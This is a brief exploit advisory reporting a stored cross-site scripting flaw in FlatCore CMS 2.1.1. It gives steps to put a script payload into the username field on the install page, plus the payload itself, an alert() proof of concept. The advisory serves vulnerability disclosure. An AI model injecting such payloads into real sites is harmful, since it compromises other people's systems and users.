# Exploit Title: FlatCore CMS 2.1.1 -Stored Cross Site Scripting# Date: 2020-09-24# Exploit Author: Sinem Şahin# Vendor Homepage: https://flatcore.org/# Version: 2.1.1# Tested on: Windows & XAMPP==> Tutorial <==1- Go to the following url.=> http://(HOST)/install/index.php
2- Write XSS Payload into the username of the user account.3- Press "Save" button.
XSS Payload ==>"<script>alert("usernameXSS")</script>